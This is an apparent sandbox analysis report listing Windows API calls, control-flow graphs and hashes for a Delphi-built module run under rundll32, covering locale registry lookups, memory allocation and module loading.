                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,04D4E3ED,?,?), ref: 04D4E201
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,04D4E3ED,?,?), ref: 04D4E24A
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,04D4E3ED,?,?), ref: 04D4E26C
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 04D4E28A
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 04D4E2A8
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 04D4E2C6
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 04D4E2E4
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,04D4E3D0,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,04D4E3ED), ref: 04D4E324
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,04D4E3D0,?,80000001), ref: 04D4E34F
                              • RegCloseKey.ADVAPI32(?,04D4E3D7,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,04D4E3D0,?,80000001,Software\Embarcadero\Locales), ref: 04D4E3CA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Open$QueryValue$CloseFileModuleName
                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                              • API String ID: 2701450724-3496071916
                              • Opcode ID: a01d383a88702e59551cdda21dc9b1bac3e3c23255f5c4ee102df8faf271b806
                              • Instruction ID: 09d61673589654b420333aa93117c798c701111f9387ce3cf7fd07797d29bc45
                              • Opcode Fuzzy Hash: a01d383a88702e59551cdda21dc9b1bac3e3c23255f5c4ee102df8faf271b806
                              • Instruction Fuzzy Hash: BD511171B4020CBFFB11DAA4CC95FAEB3BCFB88705F504465BA04F6581D6B0BA449B64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • EnterCriticalSection.KERNEL32(04F9CC14,00000000,04D4DF98,?,?,?,00000000,?,04D4E860,00000000,04D4E8BF,?,?,00000000,00000000,00000000), ref: 04D4DEB2
                              • LeaveCriticalSection.KERNEL32(04F9CC14,04F9CC14,00000000,04D4DF98,?,?,?,00000000,?,04D4E860,00000000,04D4E8BF,?,?,00000000,00000000), ref: 04D4DED6
                              • LeaveCriticalSection.KERNEL32(04F9CC14,04F9CC14,00000000,04D4DF98,?,?,?,00000000,?,04D4E860,00000000,04D4E8BF,?,?,00000000,00000000), ref: 04D4DEE5
                              • IsValidLocale.KERNEL32(00000000,00000002,04F9CC14,04F9CC14,00000000,04D4DF98,?,?,?,00000000,?,04D4E860,00000000,04D4E8BF), ref: 04D4DEF7
                              • EnterCriticalSection.KERNEL32(04F9CC14,00000000,00000002,04F9CC14,04F9CC14,00000000,04D4DF98,?,?,?,00000000,?,04D4E860,00000000,04D4E8BF), ref: 04D4DF54
                              • LeaveCriticalSection.KERNEL32(04F9CC14,04F9CC14,00000000,00000002,04F9CC14,04F9CC14,00000000,04D4DF98,?,?,?,00000000,?,04D4E860,00000000,04D4E8BF), ref: 04D4DF7D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                              • String ID: en-GB,en,en-US,
                              • API String ID: 975949045-3021119265
                              • Opcode ID: 1d42411465737e8a5b7a0c8d10f72ac75b10dd993ebc7740c7a0cc1e1ccaf0a7
                              • Instruction ID: 987add974c4eebb621e96516ac9f87384383b420d0d6051c3fb744a46c8a45e1
                              • Opcode Fuzzy Hash: 1d42411465737e8a5b7a0c8d10f72ac75b10dd993ebc7740c7a0cc1e1ccaf0a7
                              • Instruction Fuzzy Hash: 4621AF307402C4BBFF20BBB9A81162935D7EFC6B48F904567B140A7280DEA4FD418BB2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 67 4d4a6f8-4d4a705 68 4d4a707 67->68 69 4d4a70c-4d4a740 GetCurrentThreadId 67->69 68->69 70 4d4a744-4d4a770 call 4d4a5dc 69->70 71 4d4a742 69->71 74 4d4a772-4d4a774 70->74 75 4d4a779-4d4a780 70->75 71->70 74->75 76 4d4a776 74->76 77 4d4a782-4d4a785 75->77 78 4d4a78a-4d4a790 75->78 76->75 77->78 79 4d4a795-4d4a79c 78->79 80 4d4a792 78->80 81 4d4a79e-4d4a7a5 79->81 82 4d4a7ab-4d4a7af 79->82 80->79 81->82 83 4d4aa44-4d4aa5e 82->83 84 4d4a7b5 call 4d4a68c 82->84 86 4d4aa60-4d4aa6c call 4d4a924 call 4d4a9ac 83->86 87 4d4aa71-4d4aa78 83->87 88 4d4a7ba 84->88 86->87 90 4d4aa7a-4d4aa85 GetCurrentThreadId 87->90 91 4d4aa9b-4d4aa9f 87->91 90->91 93 4d4aa87-4d4aa96 call 4d4a5fc call 4d4a980 90->93 94 4d4aaa1-4d4aaa5 91->94 95 4d4aab9-4d4aabd 91->95 93->91 94->95 96 4d4aaa7-4d4aab7 94->96 97 4d4aabf-4d4aac2 95->97 98 4d4aac9-4d4aacd 95->98 96->95 97->98 101 4d4aac4-4d4aac6 97->101 102 4d4aaec-4d4aaf5 call 4d4a624 98->102 103 4d4aacf-4d4aad8 call 4d46f7c 98->103 101->98 112 4d4aaf7-4d4aafa 102->112 113 4d4aafc-4d4ab01 102->113 103->102 114 4d4aada-4d4aaea call 4d48ea8 call 4d46f7c 103->114 112->113 115 4d4ab1d-4d4ab28 call 4d4a5fc 112->115 113->115 116 4d4ab03-4d4ab11 call 4d4eaec 113->116 114->102 125 4d4ab2d-4d4ab31 115->125 126 4d4ab2a 115->126 116->115 124 4d4ab13-4d4ab15 116->124 124->115 128 4d4ab17-4d4ab18 FreeLibrary 124->128 129 4d4ab33-4d4ab35 call 4d4a980 125->129 130 4d4ab3a-4d4ab3d 125->130 126->125 128->115 129->130 132 4d4ab56-4d4ab67 130->132 133 4d4ab3f-4d4ab46 130->133 132->95 134 4d4ab4e-4d4ab51 ExitProcess 133->134 135 4d4ab48 133->135 135->134
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 04D4A72F
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: c41d173fd75db748118653cd2651b2c64282339123a2ed276cf5ad07db1eef83
                              • Instruction ID: 586e5d9cac516d0e9830a0f4b62bc0a9af41df86b88d133ec0f90ab68d84e5e9
                              • Opcode Fuzzy Hash: c41d173fd75db748118653cd2651b2c64282339123a2ed276cf5ad07db1eef83
                              • Instruction Fuzzy Hash: 37519C74680249AFEB24DF68D48475A77E0FF88318F14852AE8498B391DB78FC85CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetUserDefaultUILanguage.KERNEL32(00000000,04D4E8BF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,04D4E946,00000000,?,00000105), ref: 04D4E853
                              • GetSystemDefaultUILanguage.KERNEL32(00000000,04D4E8BF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,04D4E946,00000000,?,00000105), ref: 04D4E87B
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: DefaultLanguage$SystemUser
                              • String ID:
                              • API String ID: 384301227-0
                              • Opcode ID: b7008dbf5266f319cc20ee77ed351a9d7bc4fb15728bbdf27f8be958441483dd
                              • Instruction ID: cb5055d598c3f8929cf36eb3e8eca6290d2706950222b36bbee05f72ec12b5cf
                              • Opcode Fuzzy Hash: b7008dbf5266f319cc20ee77ed351a9d7bc4fb15728bbdf27f8be958441483dd
                              • Instruction Fuzzy Hash: 2E31F870B00259ABEF14EFA8C880AAEB7B5FFC4714F504865D410A7250DBB4BE85CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,04D4E986,?,04D40000,04F91C1C), ref: 04D4E908
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,04D4E986,?,04D40000,04F91C1C), ref: 04D4E959
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: FileLibraryLoadModuleName
                              • String ID:
                              • API String ID: 1159719554-0
                              • Opcode ID: 74faea421007910589e723566923a11faafbffd3c51653b0143b603e932f4d93
                              • Instruction ID: 255187fe0c6aab4a91cbd232ff3006baa36b33a170fe11854720028aaf068d3a
                              • Opcode Fuzzy Hash: 74faea421007910589e723566923a11faafbffd3c51653b0143b603e932f4d93
                              • Instruction Fuzzy Hash: 81119470B4021CABEB14DFA0CC85BDDB3B8EB95704F5104A6A508A3290EA746F84CEA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 226 4d4d658-4d4d666 227 4d4d693-4d4d69e 226->227 228 4d4d668-4d4d67f GetModuleFileNameW call 4d4e8cc 226->228 230 4d4d684-4d4d68b 228->230 230->227 231 4d4d68d-4d4d690 230->231 231->227
                              APIs
                              • GetModuleFileNameW.KERNEL32(04D40000,?,0000020A), ref: 04D4D676
                                • Part of subcall function 04D4E8CC: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,04D4E986,?,04D40000,04F91C1C), ref: 04D4E908
                                • Part of subcall function 04D4E8CC: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,04D4E986,?,04D40000,04F91C1C), ref: 04D4E959
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: FileModuleName$LibraryLoad
                              • String ID:
                              • API String ID: 4113206344-0
                              • Opcode ID: 53da31fff64a53f6825a8500a7483ba432167d46bc4a034368a05d7b6de3c32f
                              • Instruction ID: 108ea37558abb2b0bdd31312136664b87f85db969c0befe3258aff360202ec5e
                              • Opcode Fuzzy Hash: 53da31fff64a53f6825a8500a7483ba432167d46bc4a034368a05d7b6de3c32f
                              • Instruction Fuzzy Hash: BAE0ED71A003149BDF50DF5CD8C4A4637D4BB49754F0449A1AD18CF246D371E914CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 232 4d502f4-4d50304 GetSystemInfo
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: InfoSystem
                              • String ID:
                              • API String ID: 31276548-0
                              • Opcode ID: cfabf06fd0a7d5aa08c154ff74241a738d374e25dc305ab9149cadf724005ebe
                              • Instruction ID: 80fafaf7ffb912e57ba90df12fc1a4a802a350e95584bbaecf06b3521c86ef52
                              • Opcode Fuzzy Hash: cfabf06fd0a7d5aa08c154ff74241a738d374e25dc305ab9149cadf724005ebe
                              • Instruction Fuzzy Hash: 66A012205084015BCC04E7585C8240B31805980114FC40210645C95691E605996806E7
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 233 4d45694-4d456b2 call 4d45628 VirtualAlloc 236 4d456b4-4d45701 233->236 237 4d45702-4d4570d 233->237
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,04D45CAB), ref: 04D456AB
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 6e2b884e79fc338b54b91229fae632d089e176642786e195da36f0ebebc4b6c0
                              • Instruction ID: 81a4495dbe6658406bc6eae0af5992bc2be0daf700ef0406dc5e0614a7ccf7e4
                              • Opcode Fuzzy Hash: 6e2b884e79fc338b54b91229fae632d089e176642786e195da36f0ebebc4b6c0
                              • Instruction Fuzzy Hash: BDF087F2F413419BEB189F78AA407027BE4F748354F10423EEA49DB688EBB89C018784
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 347 4d4dfd8-4d4dffe GetModuleHandleW 348 4d4e000-4d4e00f GetProcAddress 347->348 349 4d4e03d-4d4e044 347->349 348->349 352 4d4e011-4d4e025 348->352 350 4d4e046-4d4e04e 349->350 351 4d4e081-4d4e084 349->351 353 4d4e054-4d4e065 call 4d4dfb4 350->353 354 4d4e18e-4d4e197 350->354 355 4d4e087-4d4e08e 351->355 352->349 362 4d4e027-4d4e038 call 4d4d9fc 352->362 353->354 365 4d4e06b-4d4e079 call 4d4dfb4 353->365 357 4d4e090 355->357 358 4d4e093-4d4e09b 355->358 357->358 358->354 361 4d4e0a1-4d4e0b1 call 4d4d9fc 358->361 369 4d4e173-4d4e177 361->369 362->354 365->354 373 4d4e07f 365->373 371 4d4e0b6-4d4e0c6 call 4d4dfb4 369->371 372 4d4e17d-4d4e189 call 4d4d9fc 369->372 377 4d4e0c8 371->377 378 4d4e0cb-4d4e0d3 371->378 372->354 373->355 377->378 378->354 379 4d4e0d9-4d4e0eb 378->379 380 4d4e0f0-4d4e112 call 4d4d9fc FindFirstFileW 379->380 381 4d4e0ed 379->381 380->354 384 4d4e114-4d4e134 FindClose lstrlenW 380->384 381->380 384->354 385 4d4e136-4d4e171 call 4d4d9fc lstrlenW 384->385 385->369
                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 04D4DFF5
                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 04D4E006
                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 04D4E106
                              • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 04D4E118
                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 04D4E124
                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 04D4E169
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                              • String ID: GetLongPathNameW$\$kernel32.dll
                              • API String ID: 1930782624-3908791685
                              • Opcode ID: ee891bf4c575c78e3d859dea37658da9103e5d8f8bcb36fa1d297392f158183d
                              • Instruction ID: 6b7bc6aaff8b514a7a1c0087fe5c0ce41870cbbcd5b4f1a10d867008e29caa40
                              • Opcode Fuzzy Hash: ee891bf4c575c78e3d859dea37658da9103e5d8f8bcb36fa1d297392f158183d
                              • Instruction Fuzzy Hash: 4C416D31F00618ABDB20EFA8CC84ADEB3F6FF85314F1485A59644E7250EB74BE458B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindowLongW.USER32(?,000000EC), ref: 04F2A98E
                              • IsIconic.USER32(?), ref: 04F2A9BC
                              • IsWindowVisible.USER32(?), ref: 04F2A9CC
                              • ShowWindow.USER32(?,00000000,00000000,?,?,?,04F37CEF,?,04FA01D8), ref: 04F2A9E9
